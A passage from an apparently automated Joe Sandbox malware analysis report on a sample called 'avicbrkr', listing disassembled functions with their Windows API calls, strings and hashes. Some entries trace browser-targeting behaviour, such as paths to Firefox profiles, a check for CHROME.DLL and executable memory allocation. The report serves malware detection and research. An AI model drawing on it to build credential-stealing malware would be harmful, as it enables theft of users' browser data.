                      • Instruction ID: 0a9d48b56e2135b025eac269fef962b941805c8db5c06eb548a90a1f3a8306f8
                      • Opcode Fuzzy Hash: 866a729b50c62e94591eb7874d7f55acee35c41f09f101880f2f70c4dad3531b
                      • Instruction Fuzzy Hash: 21118E76904118FFDF23AF54DC41E9E7F69EF047A0F158452FD08A6261D236AE609BD0
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 003723D9, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51COMMON
                      Download Yara Rule
                      APIs
                      • GetCommandLineW.KERNEL32(00000000,5AFF7C2A,5AFF7C2A,00000001,0037B75E,00000000,00000000,?,0037D9D1,?,0000005C,?,0037DDEC,?,?,0039E605), ref: 003723E1
                      • ExitProcess.KERNEL32 ref: 00372454
                        • Part of subcall function 00391663: FindFirstFileW.KERNEL32(?,?,?,0039F9E0), ref: 003916E1
                        • Part of subcall function 00391663: FindNextFileW.KERNEL32(?,00000010), ref: 0039176B
                        • Part of subcall function 00391663: FindClose.KERNEL32(00000002), ref: 00391779
                        • Part of subcall function 00391663: FreeLibrary.KERNEL32(?), ref: 0039178B
                        • Part of subcall function 003722AA: RtlAllocateHeap.NTDLL(00000000,00000000,00000000), ref: 003722CD
                        • Part of subcall function 003722AA: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 0037230E
                      Strings
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: Find$FileFreeHeap$AllocateCloseCommandExitFirstLibraryLineNextProcess
                      • String ID: gU9
                      • API String ID: 2330343010-705701294
                      • Opcode ID: 91379467f2f6223d97080d9a5cd4a6ba58a5c8f35beaff73ac90dfec5edd6de7
                      • Instruction ID: 709125342ab3714d164014ae33e57d4511c5d31472b15adb6ab823ea6e280316
                      • Opcode Fuzzy Hash: 91379467f2f6223d97080d9a5cd4a6ba58a5c8f35beaff73ac90dfec5edd6de7
                      • Instruction Fuzzy Hash: 5F010C31A10215AFDF22ABA2DC49B9F7BBCAF04741F058065F909E6190DB79DE41CB61
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 00378837, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50memoryCOMMON
                      Download Yara Rule
                      APIs
                      • RtlAllocateHeap.NTDLL(00000000,?), ref: 00378866
                      • HeapFree.KERNEL32(00000000,00000000), ref: 00378899
                      Strings
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: Heap$AllocateFree
                      • String ID: ZN9
                      • API String ID: 2488874121-2945816823
                      • Opcode ID: f76789e2192d573b170597a8bd4c3d6e5db77ecfaf16d451b0dad00c67364525
                      • Instruction ID: 23bfc063c804ae868fda3c26b590b4f6eb3492dfc646c4e4dbcbcd937d8bc926
                      • Opcode Fuzzy Hash: f76789e2192d573b170597a8bd4c3d6e5db77ecfaf16d451b0dad00c67364525
                      • Instruction Fuzzy Hash: 92014BB6910208FFEB12DF99DCC5DAFBBBCEB44390F104066FA01A2250D6769E419B60
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 003785C5, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49memoryCOMMON
                      Download Yara Rule
                      APIs
                      • RtlAllocateHeap.NTDLL(00000000,?), ref: 003785F7
                      • HeapFree.KERNEL32(00000000,00000000), ref: 0037861C
                      Strings
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: Heap$AllocateFree
                      • String ID: )O9
                      • API String ID: 2488874121-3761864639
                      • Opcode ID: a525a6a8206566391b718f95919ad3776b2e2367203753d70d96df5fe7582855
                      • Instruction ID: 458fbd47fd2906cf77156df2b1f7d3774354122aa24ad5e8c60936aa25b53941
                      • Opcode Fuzzy Hash: a525a6a8206566391b718f95919ad3776b2e2367203753d70d96df5fe7582855
                      • Instruction Fuzzy Hash: AE0162B650000CFF9B12DF95DC84CAE7BBEEB89394B114062FA05D3110D67A9E01DB60
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 0038834C, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 48COMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 003712EA: RtlAllocateHeap.NTDLL(00000000,00000000,00388635), ref: 003712F6
                      • GetVersion.KERNEL32(?,0000005C,?,0037DDEC,?,?,0039E605,00000001,0039D2DC,00000000), ref: 00388397
                      • GetModuleHandleA.KERNEL32(0039E01D,?,0000005C,?,0037DDEC,?,?,0039E605,00000001,0039D2DC,00000000), ref: 003883C4
                        • Part of subcall function 0038A8DB: GetModuleHandleA.KERNEL32(0039E8AE,0039712C,0039712C,00000000,?,?,?,00000001,003883AE,?,0000005C,?,0037DDEC,?,?,0039E605), ref: 0038A8EC
                        • Part of subcall function 0038A8DB: LoadLibraryA.KERNEL32(0039EB71), ref: 0038A986
                        • Part of subcall function 0038A8DB: FreeLibrary.KERNEL32(00000000), ref: 0038A991
                      Strings
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: HandleLibraryModule$AllocateFreeHeapLoadVersion
                      • String ID: H}*
                      • API String ID: 3715412493-3236088583
                      • Opcode ID: 08847abf288af1fd352bb71529561fc37048fb7fdf9a3ee65d3a5de083fd4d90
                      • Instruction ID: 0efed7d63a193e05a3cd5995547ae8312d0803b6034f115c6b62da5abe61e6c9
                      • Opcode Fuzzy Hash: 08847abf288af1fd352bb71529561fc37048fb7fdf9a3ee65d3a5de083fd4d90
                      • Instruction Fuzzy Hash: FD0192BA910311DFDB23AF7AAD875067BACF748711F41497BE045C7264CBB268418B90
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 00371E21, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 48memoryCOMMON
                      Download Yara Rule
                      APIs
                      • RtlAllocateHeap.NTDLL(00000000,00000105), ref: 00371E33
                        • Part of subcall function 00371C56: lstrlen.KERNEL32(%APPDATA%), ref: 00371C6E
                        • Part of subcall function 00371C56: RtlAllocateHeap.NTDLL(00000000,?,%APPDATA%\Mozilla\Firefox\Profiles), ref: 00371CB9
                        • Part of subcall function 00371C56: mbstowcs.NTDLL ref: 00371CCC
                        • Part of subcall function 00371C56: lstrcatW.KERNEL32(00000000,0039E774), ref: 00371CDB
                        • Part of subcall function 00371C56: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 00371CFF
                        • Part of subcall function 00371C56: RtlAllocateHeap.NTDLL(00000000,0000020C), ref: 00371D11
                        • Part of subcall function 00371C56: lstrcatW.KERNEL32(00000000,003973F0), ref: 00371D33
                        • Part of subcall function 00371C56: HeapFree.KERNEL32(00000000,00000000), ref: 00371D57
                        • Part of subcall function 00371C56: CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00371D7D
                        • Part of subcall function 00371C56: DeleteFileW.KERNEL32(?), ref: 00371DCC
                        • Part of subcall function 00371C56: HeapFree.KERNEL32(00000000,?), ref: 00371DDA
                        • Part of subcall function 00371C56: HeapFree.KERNEL32(00000000,?), ref: 00371DF6
                      • HeapFree.KERNEL32(00000000,00000000), ref: 00371E78
                      Strings
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: Heap$Free$Allocate$lstrcat$CreateDeleteDirectoryFilelstrlenmbstowcs
                      • String ID: ]U9
                      • API String ID: 127329105-65816040
                      • Opcode ID: ed1180c25afa60b726868a7a7ee6d5d2535b5a53bf7f145f2b8494b8ce46428e
                      • Instruction ID: 67cc8c16c09979eb55844626f8998530b80b38212bf666a49d206949d8151363
                      • Opcode Fuzzy Hash: ed1180c25afa60b726868a7a7ee6d5d2535b5a53bf7f145f2b8494b8ce46428e
                      • Instruction Fuzzy Hash: 41F0B4F32053193EE33337696C89E6B2A4DDB817E4F114022F60596190DA698C4285B0
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 003780C2, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47COMMON
                      Download Yara Rule
                      APIs
                      • memcpy.NTDLL(?,?,?), ref: 00378109
                      • StrToIntExA.SHLWAPI(00000000,00000001,00000000), ref: 0037811B
                      Strings
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: memcpy
                      • String ID: ~FvR9
                      • API String ID: 3510742995-3041887914
                      • Opcode ID: 100229854cb540b7d4b2ec23dcfa860b84a5d0e8693fd3a85f530445d393c0ef
                      • Instruction ID: 0e78b178dde0b7069217e810bbdb50bd8a89538e50a65e0fe2290d2fdd7befa4
                      • Opcode Fuzzy Hash: 100229854cb540b7d4b2ec23dcfa860b84a5d0e8693fd3a85f530445d393c0ef
                      • Instruction Fuzzy Hash: 3C017175910219BBDB12EBA8CC05AEEBBB9FB58740F404425E904E7250EB75EA0AC7D1
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 0038D82C, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42stringCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 003712EA: RtlAllocateHeap.NTDLL(00000000,00000000,00388635), ref: 003712F6
                      • _wcsupr.NTDLL ref: 0038D863
                      • lstrlenW.KERNEL32(00000000), ref: 0038D86B
                        • Part of subcall function 003712FF: HeapFree.KERNEL32(00000000,?,0038BAC1), ref: 0037130B
                      Strings
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: Heap$AllocateFree_wcsuprlstrlen
                      • String ID: R9
                      • API String ID: 2355695313-134138977
                      • Opcode ID: b7902668f28daf6996588abb135ed1b539effbe53a5ee46c00a22c8f0d2bf7a5
                      • Instruction ID: 8b744f3ac363c83d4e4bd71666ac744d54fd69fa9f3ba221e1d8b20b29418a75
                      • Opcode Fuzzy Hash: b7902668f28daf6996588abb135ed1b539effbe53a5ee46c00a22c8f0d2bf7a5
                      • Instruction Fuzzy Hash: 6DF0E2322117116F93237BB8AC89E6F6A5DEF81BA0F21457AF445C6291CE65CC0283A0
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 003881D1, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41COMMON
                      Download Yara Rule
                      APIs
                      • RtlEnterCriticalSection.NTDLL(H}*), ref: 003881F9
                      • RtlLeaveCriticalSection.NTDLL(H}*), ref: 0038820A
                        • Part of subcall function 00387EF9: lstrlen.KERNEL32(?,?,00000000,?,0037B64A,00000000,?,0000005C,00000000,00000000,00000000,0037D9D1,?,0000005C,?,0037DDEC), ref: 00387F47
                        • Part of subcall function 00387EF9: lstrcpy.KERNEL32(00000000,?), ref: 00387F68
                        • Part of subcall function 00387EF9: GetLastError.KERNEL32(?,00000000,0037DB89,?,0039D270,?,00000000,003713EB), ref: 0038802E
                        • Part of subcall function 003712FF: HeapFree.KERNEL32(00000000,?,0038BAC1), ref: 0037130B
                      Strings
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: CriticalSection$EnterErrorFreeHeapLastLeavelstrcpylstrlen
                      • String ID: H}*
                      • API String ID: 2732097048-3236088583
                      • Opcode ID: 14111a80687c924962611589c9df5ac572fde31720e46cb425c3dc0cfe9ab526
                      • Instruction ID: bab2bfc98b1788c38551c724557324760527e48f3f15e5fe2592e9cbbf486191
                      • Opcode Fuzzy Hash: 14111a80687c924962611589c9df5ac572fde31720e46cb425c3dc0cfe9ab526
                      • Instruction Fuzzy Hash: CDF08C726093059BC712AF28D84496BB7E8EFA8751F0148AEF88587312DB35E8058BA1
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 00377D37, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 33filememoryCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00387665: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,003711C5,000004D2), ref: 0038769D
                        • Part of subcall function 00387665: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,003711C5,000004D2), ref: 003876A9
                        • Part of subcall function 00387665: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 003876B7
                        • Part of subcall function 00387665: lstrcpy.KERNEL32(00000000), ref: 003876D2
                      • DeleteFileA.KERNEL32(00000000,00000000,?,?,00000001,00000929,00000000,0000005C,?,00372304,00000000,00000000,?,0000000E), ref: 00377D76
                      • HeapFree.KERNEL32(00000000,00000000), ref: 00377D85
                        • Part of subcall function 003779BC: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 003779FD
                        • Part of subcall function 003779BC: lstrlen.KERNEL32(00000000,?,00000000,?,?,00371255,00000000,00000000,00000004), ref: 00377A15
                        • Part of subcall function 003779BC: RtlAllocateHeap.NTDLL(00000000,00000002), ref: 00377A29
                        • Part of subcall function 003779BC: mbstowcs.NTDLL ref: 00377A39
                        • Part of subcall function 003779BC: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 00377A57
                        • Part of subcall function 003779BC: CloseHandle.KERNEL32(?), ref: 00377A61
                        • Part of subcall function 003779BC: HeapFree.KERNEL32(00000000,00000000,?), ref: 00377A70
                      Strings
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: FileHeap$Free$Time$AllocateCloseCreateCurrentDeleteHandleNameSystemTempThreadlstrcpylstrlenmbstowcs
                      • String ID: 6$7\
                      • API String ID: 2003494416-966405046
                      • Opcode ID: 70b0a4b2e17cdd33f91205f8bb8e14f2a864a7a6b343ddc7f52b44eb7ed6f73b
                      • Instruction ID: bcc0919cce194158d31519ec4dac2dad2674926d28f09c082fa24f4c975d7577
                      • Opcode Fuzzy Hash: 70b0a4b2e17cdd33f91205f8bb8e14f2a864a7a6b343ddc7f52b44eb7ed6f73b
                      • Instruction Fuzzy Hash: 7EF05533209611BBC6336B21DC0AF9F3E1ACFC13A0F114029F2488A2E0DB36C806D7A1
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 00373069, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 32fileCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00386EB8: lstrlen.KERNEL32(?,?,00000000,?,00000000,003777E2,?,?,?,?,?,?,?,?,?,00371255), ref: 00386EC7
                      • DeleteFileW.KERNEL32(00000000), ref: 00373080
                        • Part of subcall function 003712FF: HeapFree.KERNEL32(00000000,?,0038BAC1), ref: 0037130B
                        • Part of subcall function 003892D7: lstrlenW.KERNEL32(00000000,00000000,?,?,00000000,?,00373090,00000000), ref: 003892FB
                        • Part of subcall function 003892D7: lstrcpy.KERNEL32(00000000), ref: 0038932B
                        • Part of subcall function 003892D7: GetTickCount.KERNEL32(00000104), ref: 00389353
                      • GetLastError.KERNEL32(?,00000000,?), ref: 003731DA
                        • Part of subcall function 00371473: RtlAllocateHeap.NTDLL(00000000,?), ref: 003714AA
                        • Part of subcall function 00371473: wsprintfA.USER32 ref: 003714CD
                        • Part of subcall function 00371473: HeapFree.KERNEL32(00000000,00000000,?), ref: 003714FE
                      Strings
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: Heap$Freelstrlen$AllocateCountDeleteErrorFileLastTicklstrcpywsprintf
                      • String ID: L"7
                      • API String ID: 2703577323-2580434585
                      • Opcode ID: 6f88456f80297bca1d123adcd53822c2074794db7bd11f7df0c67571dd816229
                      • Instruction ID: ba9f5bb17972d11aec5610a2e14ae080a1d10aa082c94f17dac85ff9b73a46bc
                      • Opcode Fuzzy Hash: 6f88456f80297bca1d123adcd53822c2074794db7bd11f7df0c67571dd816229
                      • Instruction Fuzzy Hash: CAE068332051640F8B333B799C4A4BF224D9D82331743C526FC2AE72C0EF2E8E026251
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 003880F9, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 32COMMON
                      Download Yara Rule
                      APIs
                      • RtlEnterCriticalSection.NTDLL(0039D4E0), ref: 00388103
                      • RtlLeaveCriticalSection.NTDLL(0039D4E0), ref: 0038813F
                        • Part of subcall function 00387EF9: lstrlen.KERNEL32(?,?,00000000,?,0037B64A,00000000,?,0000005C,00000000,00000000,00000000,0037D9D1,?,0000005C,?,0037DDEC), ref: 00387F47
                        • Part of subcall function 00387EF9: lstrcpy.KERNEL32(00000000,?), ref: 00387F68
                        • Part of subcall function 00387EF9: GetLastError.KERNEL32(?,00000000,0037DB89,?,0039D270,?,00000000,003713EB), ref: 0038802E
                        • Part of subcall function 003712FF: HeapFree.KERNEL32(00000000,?,0038BAC1), ref: 0037130B
                      Strings
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: CriticalSection$EnterErrorFreeHeapLastLeavelstrcpylstrlen
                      • String ID: H}*
                      • API String ID: 2732097048-3236088583
                      • Opcode ID: c125926760b8969e3e12818e978880b3594deecd970be9a9d9bd5f01c09b817c
                      • Instruction ID: ff78928416c44763be0493a4c0545faae36baeab8d83adc23c967a6c9c35f073
                      • Opcode Fuzzy Hash: c125926760b8969e3e12818e978880b3594deecd970be9a9d9bd5f01c09b817c
                      • Instruction Fuzzy Hash: 87F0E5772022149F8B227F1AAD8A879F7ADEB9936471601DBE91193311CF727C01C7E0
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 00376490, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24memoryCOMMON
                      Download Yara Rule
                      APIs
                      • GetModuleHandleA.KERNEL32(0039E065,00000000,0037B7B6,00000000,00000000,?,0037D9D1,?,0000005C,?,0037DDEC,?,?,0039E605,00000001,0039D2DC), ref: 00376496
                      • TlsAlloc.KERNEL32(?,0037D9D1,?,0000005C,?,0037DDEC,?,?,0039E605,00000001,0039D2DC,00000000), ref: 003764A2
                        • Part of subcall function 00376361: RtlImageNtHeader.NTDLL(?), ref: 00376376
                        • Part of subcall function 00376361: VirtualAlloc.KERNEL32(00000000,01000000,00003000,00000040,0037D9D1,0037D9D1,00000000,?,0037D9D1,00000001,00000000,?,0037D9D1,?,0000005C), ref: 0037643C
                        • Part of subcall function 0037B5CD: HeapFree.KERNEL32(00000000,?,00000000), ref: 0037B634
                      Strings
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: Alloc$FreeHandleHeaderHeapImageModuleVirtual
                      • String ID: CHROME.DLL
                      • API String ID: 1533827403-1627437769
                      • Opcode ID: b98056b359a79f908a4ccfa11e4551f39febbf4c4cae30e504452222e08a98fe
                      • Instruction ID: 7696f15e48bd0b4218cb004095cfca816886f45c3ae4979c0598303de3e8de99
                      • Opcode Fuzzy Hash: b98056b359a79f908a4ccfa11e4551f39febbf4c4cae30e504452222e08a98fe
                      • Instruction Fuzzy Hash: C8E08635569A2067C93337697C5BBC9B6545B04B70F054242F91CA53D0C6B9488585A0
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 00633633, Relevance: 5.1, APIs: 4, Instructions: 110COMMON
                      Download Yara Rule
                      APIs
                      • memset.NTDLL ref: 00633659
                      • memcpy.NTDLL ref: 00633681
                        • Part of subcall function 00633D34: RtlNtStatusToDosError.NTDLL(00000000), ref: 00633D6C
                        • Part of subcall function 00633D34: SetLastError.KERNEL32(00000000), ref: 00633D73
                      • GetLastError.KERNEL32(00000010,00000218,00634E3D,00000100,?,00000318,00000008), ref: 00633698
                        • Part of subcall function 00633CF3: RtlNtStatusToDosError.NTDLL(C0000002), ref: 00633D20
                        • Part of subcall function 00633CF3: SetLastError.KERNEL32(00000000,?,006319D6,?,00000004,0063244E,00000004,?,?,?,?,006322FD,00000000,0063244E,CCCCFEEB,00000000), ref: 00633D27
                      • GetLastError.KERNEL32(00000010,?,00000000,00000318,?,?,?,?,?,?,?,?,00000010,00000218,00634E3D,00000100), ref: 0063377B
                      Memory Dump Source
                      • Source File: 00000010.00000002.1217259032.00631000.00000020.sdmp, Offset: 00631000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_631000_avicbrkr.jbxd
                      Similarity
                      • API ID: Error$Last$Status$memcpymemset
                      • String ID:
                      • API String ID: 1551833903-0
                      • Opcode ID: 68ad9a529400012a31ee570ad98dd83c4040afae3d0b71acf164cc176c6d897e
                      • Instruction ID: f19fecd12654d3d7559ec45b81fa44a8a6a487e8cacc5df54b52ea16e8f97300
                      • Opcode Fuzzy Hash: 68ad9a529400012a31ee570ad98dd83c4040afae3d0b71acf164cc176c6d897e
                      • Instruction Fuzzy Hash: 81415FB1504301AFD761DF24DC42B9BB7EAAF98310F10892DF999C6351E730D9158BA6
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 00388BB9, Relevance: 5.1, APIs: 4, Instructions: 110COMMON
                      Download Yara Rule
                      APIs
                      • memset.NTDLL ref: 00388BDF
                      • memcpy.NTDLL ref: 00388C07
                        • Part of subcall function 00389524: RtlNtStatusToDosError.NTDLL(00000000), ref: 0038955C
                        • Part of subcall function 00389524: SetLastError.KERNEL32(00000000), ref: 00389563
                      • GetLastError.KERNEL32(00000010,00000218,003955FD,00000100,?,00000318,00000008), ref: 00388C1E
                        • Part of subcall function 003894E3: RtlNtStatusToDosError.NTDLL(C0000002), ref: 00389510
                        • Part of subcall function 003894E3: SetLastError.KERNEL32(00000000,?,00388DE7,00083097,00000000,00000000,00000318,00000010,?,00010003,00083097,?,00000318,00000008), ref: 00389517
                      • GetLastError.KERNEL32(00000010,?,00000000,00000318,?,?,?,?,?,?,?,?,00000010,00000218,003955FD,00000100), ref: 00388D01
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: Error$Last$Status$memcpymemset
                      • String ID:
                      • API String ID: 1551833903-0
                      • Opcode ID: c02d4cb18c1f0aea13c20ef30fdc36f708fd118352be85c04a1f28b37f67f8d0
                      • Instruction ID: 05caeede123d1409b12a6e5e8b0d344153f6189b1f5fc8eb4395c1e1487f723b
                      • Opcode Fuzzy Hash: c02d4cb18c1f0aea13c20ef30fdc36f708fd118352be85c04a1f28b37f67f8d0
                      • Instruction Fuzzy Hash: 1E4193B1504301AFDB22EF24DC41F9BBBF9BB98310F40492DF599CA291EB30D9148B62
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 0038F4DA, Relevance: 5.1, APIs: 4, Instructions: 70stringCOMMON
                      Download Yara Rule
                      APIs
                      • lstrlen.KERNEL32(00000000,00000008,00000000,?,00000000,?,0038FADF,00000000,00000000,00000004,00000000,?), ref: 0038F4E6
                        • Part of subcall function 003712EA: RtlAllocateHeap.NTDLL(00000000,00000000,00388635), ref: 003712F6
                      • memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,0038FADF,00000000,00000000,00000004,00000000,?), ref: 0038F544
                      • lstrcpy.KERNEL32(00000000,00000008), ref: 0038F554
                      • lstrcpy.KERNEL32(00000000,00000000), ref: 0038F560
                        • Part of subcall function 003712FF: HeapFree.KERNEL32(00000000,?,0038BAC1), ref: 0037130B
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: Heaplstrcpy$AllocateFreelstrlenmemcpy
                      • String ID:
                      • API String ID: 3360227210-0
                      • Opcode ID: 8f7036395cef4e68cec6fa844a1780a5ad2533f0f56c82e86d570bfd581150e9
                      • Instruction ID: 338e6b45ef731b2e46d84a8cf68f9806c79a80d138597ee771d4c903b656fcf8
                      • Opcode Fuzzy Hash: 8f7036395cef4e68cec6fa844a1780a5ad2533f0f56c82e86d570bfd581150e9
                      • Instruction Fuzzy Hash: FC217272504315EFCB23AF78CC59AAB7FBC9F4A790F1580A5F8059F212D635DA0187A0
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 00385FDD, Relevance: 5.1, APIs: 4, Instructions: 64COMMON
                      Download Yara Rule
                      APIs
                      • memset.NTDLL ref: 00386011
                      • memset.NTDLL ref: 00386028
                      • memset.NTDLL ref: 0038603F
                        • Part of subcall function 003836DE: CloseHandle.KERNEL32(00000000), ref: 003836E9
                        • Part of subcall function 003836DE: memset.NTDLL ref: 003836F8
                      • memset.NTDLL ref: 00386057
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: memset$CloseHandle
                      • String ID:
                      • API String ID: 1628094390-0
                      • Opcode ID: 0b0cd86c4de8a885383866b204d508500df37b6cbce926e7c36b5e08908b1c78
                      • Instruction ID: 9f4963b38038fbc32a583d86bdd39de01f0863872b02703ed16af38c818af2b3
                      • Opcode Fuzzy Hash: 0b0cd86c4de8a885383866b204d508500df37b6cbce926e7c36b5e08908b1c78
                      • Instruction Fuzzy Hash: 7C11A0B2900709BFCB22AFA1EC42E66B779FF09300B060558F94496912D773B9B19BD5
                      Uniqueness

                      Uniqueness Score: -1,00%